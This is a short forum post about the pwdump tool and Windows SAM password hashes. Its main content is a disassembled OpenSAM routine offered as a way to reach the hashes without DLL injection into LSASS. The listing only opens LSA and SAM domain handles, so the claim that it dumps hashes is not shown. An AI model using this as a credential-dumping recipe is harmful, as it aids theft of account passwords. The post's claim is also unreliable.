
pwdump on windows

  • 01-11-2008 3:10am


    pwdump3 starts a service on the system, which loads a DLL into LSASS; that DLL connects to the SAM RPC service and reads the un-SYSKEY'd hashes, writing them to stdout or a file.

    I always thought this was too much code... here is the disassembled code that does it without injection.
    There is also another way, using the task scheduler, but it requires disassembly too.

    [php]
    .text:01007AE3 _OpenSAM@8 proc near ; CODE XREF: ntalias_enum()+78p
    .text:01007AE3 ; ntalias_display(x)+47p ...
    .text:01007AE3
    .text:01007AE3 ObjectAttributes= _LSA_OBJECT_ATTRIBUTES ptr -28h
    .text:01007AE3 SystemName = _LSA_UNICODE_STRING ptr -10h
    .text:01007AE3 var_8 = dword ptr -8
    .text:01007AE3 Buffer = dword ptr -4
    .text:01007AE3 Str = dword ptr 8
    .text:01007AE3 arg_4 = dword ptr 0Ch
    .text:01007AE3
    .text:01007AE3 mov edi, edi
    .text:01007AE5 push ebp
    .text:01007AE6 mov ebp, esp
    .text:01007AE8 sub esp, 28h
    .text:01007AEB push esi
    .text:01007AEC lea eax, [ebp+SystemName]
    .text:01007AEF push eax ; int
    .text:01007AF0 push [ebp+Str] ; Str
    .text:01007AF3 xor esi, esi
    .text:01007AF5 mov [ebp+var_8], esi
    .text:01007AF8 mov [ebp+Buffer], esi
    .text:01007AFB mov [ebp+SystemName.Length], 2
    .text:01007B01 mov [ebp+SystemName.Buffer], offset asc_10015F8 ; ""
    .text:01007B08 call _CreateUnicodeString@8 ; CreateUnicodeString(x,x)
    .text:01007B0D cmp eax, esi
    .text:01007B0F jnz loc_1007CB0
    .text:01007B15 mov eax, [ebp+arg_4]
    .text:01007B18 dec eax
    .text:01007B19 jz short loc_1007B2F
    .text:01007B1B dec eax
    .text:01007B1C jz short loc_1007B26
    .text:01007B1E push 57h
    .text:01007B20 pop eax
    .text:01007B21 jmp loc_1007CB0
    .text:01007B26 ;
    .text:01007B26
    .text:01007B26 loc_1007B26: ; CODE XREF: OpenSAM(x,x)+39j
    .text:01007B26 mov [ebp+Str], 203C5h
    .text:01007B2D jmp short loc_1007B36
    .text:01007B2F ;
    .text:01007B2F
    .text:01007B2F loc_1007B2F: ; CODE XREF: OpenSAM(x,x)+36j
    .text:01007B2F mov [ebp+Str], 20385h
    .text:01007B36
    .text:01007B36 loc_1007B36: ; CODE XREF: OpenSAM(x,x)+4Aj
    .text:01007B36 push ebx
    .text:01007B37 push edi
    .text:01007B38 push 18h
    .text:01007B3A pop edi
    .text:01007B3B push offset _LsaHandle ; PolicyHandle
    .text:01007B40 push 20801h ; DesiredAccess
    .text:01007B45 lea eax, [ebp+ObjectAttributes]
    .text:01007B48 push eax ; ObjectAttributes
    .text:01007B49 lea eax, [ebp+SystemName]
    .text:01007B4C push eax ; SystemName
    .text:01007B4D mov [ebp+ObjectAttributes.Length], edi
    .text:01007B50 mov [ebp+ObjectAttributes.RootDirectory], esi
    .text:01007B53 mov [ebp+ObjectAttributes.Attributes], esi
    .text:01007B56 mov [ebp+ObjectAttributes.ObjectName], esi
    .text:01007B59 mov [ebp+ObjectAttributes.SecurityDescriptor], esi
    .text:01007B5C mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
    .text:01007B5F call _LsaOpenPolicy@16 ; LsaOpenPolicy(x,x,x,x)
    .text:01007B64 cmp eax, esi
    .text:01007B66 jl loc_1007C2F
    .text:01007B6C lea eax, [ebp+Buffer]
    .text:01007B6F push eax ; Buffer
    .text:01007B70 push 5 ; InformationClass
    .text:01007B72 push _LsaHandle ; PolicyHandle
    .text:01007B78 call _LsaQueryInformationPolicy@12 ; LsaQueryInformationPolicy(x,x,x)
    .text:01007B7D cmp eax, esi
    .text:01007B7F jl loc_1007C2F
    .text:01007B85 lea eax, [ebp+ObjectAttributes]
    .text:01007B88 push eax
    .text:01007B89 push 20031h
    .text:01007B8E lea eax, [ebp+var_8]
    .text:01007B91 push eax
    .text:01007B92 lea eax, [ebp+SystemName]
    .text:01007B95 push eax
    .text:01007B96 mov [ebp+ObjectAttributes.Length], edi
    .text:01007B99 mov [ebp+ObjectAttributes.RootDirectory], esi
    .text:01007B9C mov [ebp+ObjectAttributes.Attributes], esi
    .text:01007B9F mov [ebp+ObjectAttributes.ObjectName], esi
    .text:01007BA2 mov [ebp+ObjectAttributes.SecurityDescriptor], esi
    .text:01007BA5 mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
    .text:01007BA8 call _SamConnect@16 ; SamConnect(x,x,x,x)
    .text:01007BAD cmp eax, esi
    .text:01007BAF jl short loc_1007C2F
    .text:01007BB1 mov eax, [ebp+Buffer]
    .text:01007BB4 push dword ptr [eax+8] ; pSid
    .text:01007BB7 call ds:__imp__GetLengthSid@4 ; GetLengthSid(x)
    .text:01007BBD mov edi, eax
    .text:01007BBF push offset _AccountDomainSid
    .text:01007BC4 push edi
    .text:01007BC5 call _AllocMem@8 ; AllocMem(x,x)
    .text:01007BCA mov ebx, eax
    .text:01007BCC cmp ebx, esi
    .text:01007BCE jnz short loc_1007C37
    .text:01007BD0 mov eax, [ebp+Buffer]
    .text:01007BD3 push dword ptr [eax+8] ; pSourceSid
    .text:01007BD6 push _AccountDomainSid ; pDestinationSid
    .text:01007BDC push edi ; nDestinationSidLength
    .text:01007BDD call ds:__imp__CopySid@12 ; CopySid(x,x,x)
    .text:01007BE3 test eax, eax
    .text:01007BE5 jnz short loc_1007BEF
    .text:01007BE7 call ds:__imp__GetLastError@0 ; GetLastError()
    .text:01007BED jmp short loc_1007C35
    .text:01007BEF ;
    .text:01007BEF
    .text:01007BEF loc_1007BEF: ; CODE XREF: OpenSAM(x,x)+102j
    .text:01007BEF mov eax, [ebp+Buffer]
    .text:01007BF2 push offset _AccountsDomainHandle
    .text:01007BF7 push dword ptr [eax+8]
    .text:01007BFA push [ebp+Str]
    .text:01007BFD push [ebp+var_8]
    .text:01007C00 call _SamOpenDomain@16 ; SamOpenDomain(x,x,x,x)
    .text:01007C05 cmp eax, esi
    .text:01007C07 jl short loc_1007C2F
    .text:01007C09 push esi
    .text:01007C0A call _NetpCreateWellKnownSids@4 ; NetpCreateWellKnownSids(x)
    .text:01007C0F cmp eax, esi
    .text:01007C11 jl short loc_1007C2F
    .text:01007C13 push offset _BuiltInDomainHandle
    .text:01007C18 push _BuiltinDomainSid
    .text:01007C1E push 20385h
    .text:01007C23 push [ebp+var_8]
    .text:01007C26 call _SamOpenDomain@16 ; SamOpenDomain(x,x,x,x)
    .text:01007C2B cmp eax, esi
    .text:01007C2D jge short loc_1007C8D
    .text:01007C2F
    .text:01007C2F loc_1007C2F: ; CODE XREF: OpenSAM(x,x)+83j
    .text:01007C2F ; OpenSAM(x,x)+9Cj ...
    .text:01007C2F push eax
    .text:01007C30 call _NetpNtStatusToApiStatus@4 ; NetpNtStatusToApiStatus(x)
    .text:01007C35
    .text:01007C35 loc_1007C35: ; CODE XREF: OpenSAM(x,x)+10Aj
    .text:01007C35 mov ebx, eax
    .text:01007C37
    .text:01007C37 loc_1007C37: ; CODE XREF: OpenSAM(x,x)+EBj
    .text:01007C37 mov eax, _BuiltInDomainHandle
    .text:01007C3C cmp eax, esi
    .text:01007C3E jz short loc_1007C4C
    .text:01007C40 push eax
    .text:01007C41 call _SamCloseHandle@4 ; SamCloseHandle(x)
    .text:01007C46 mov _BuiltInDomainHandle, esi
    .text:01007C4C
    .text:01007C4C loc_1007C4C: ; CODE XREF: OpenSAM(x,x)+15Bj
    .text:01007C4C mov eax, _AccountsDomainHandle
    .text:01007C51 cmp eax, esi
    .text:01007C53 jz short loc_1007C61
    .text:01007C55 push eax
    .text:01007C56 call _SamCloseHandle@4 ; SamCloseHandle(x)
    .text:01007C5B mov _AccountsDomainHandle, esi
    .text:01007C61
    .text:01007C61 loc_1007C61: ; CODE XREF: OpenSAM(x,x)+170j
    .text:01007C61 mov eax, _LsaHandle
    .text:01007C66 cmp eax, esi
    .text:01007C68 jz short loc_1007C76
    .text:01007C6A push eax ; ObjectHandle
    .text:01007C6B call _LsaClose@4 ; LsaClose(x)
    .text:01007C70 mov _LsaHandle, esi
    .text:01007C76
    .text:01007C76 loc_1007C76: ; CODE XREF: OpenSAM(x,x)+185j
    .text:01007C76 mov eax, _AccountDomainSid
    .text:01007C7B cmp eax, esi
    .text:01007C7D jz short loc_1007C8F
    .text:01007C7F push eax
    .text:01007C80 call _FreeMem@4 ; FreeMem(x)
    .text:01007C85 mov _AccountDomainSid, esi
    .text:01007C8B jmp short loc_1007C8F
    .text:01007C8D ;
    .text:01007C8D
    .text:01007C8D loc_1007C8D: ; CODE XREF: OpenSAM(x,x)+14Aj
    .text:01007C8D xor ebx, ebx
    .text:01007C8F
    .text:01007C8F loc_1007C8F: ; CODE XREF: OpenSAM(x,x)+19Aj
    .text:01007C8F ; OpenSAM(x,x)+1A8j
    .text:01007C8F cmp [ebp+Buffer], esi
    .text:01007C92 jz short loc_1007C9F
    .text:01007C94 push [ebp+Buffer] ; Buffer
    .text:01007C97 call _LsaFreeMemory@4 ; LsaFreeMemory(x)
    .text:01007C9C mov [ebp+Buffer], esi
    .text:01007C9F
    .text:01007C9F loc_1007C9F: ; CODE XREF: OpenSAM(x,x)+1AFj
    .text:01007C9F cmp [ebp+var_8], esi
    .text:01007CA2 jz short loc_1007CAC
    .text:01007CA4 push [ebp+var_8]
    .text:01007CA7 call _SamCloseHandle@4 ; SamCloseHandle(x)
    .text:01007CAC
    .text:01007CAC loc_1007CAC: ; CODE XREF: OpenSAM(x,x)+1BFj
    .text:01007CAC pop edi
    .text:01007CAD mov eax, ebx
    .text:01007CAF pop ebx
    .text:01007CB0
    .text:01007CB0 loc_1007CB0: ; CODE XREF: OpenSAM(x,x)+2Cj
    .text:01007CB0 ; OpenSAM(x,x)+3Ej
    .text:01007CB0 pop esi
    .text:01007CB1 leave
    .text:01007CB2 retn 8
    .text:01007CB2 _OpenSAM@8 endp
    [/php]

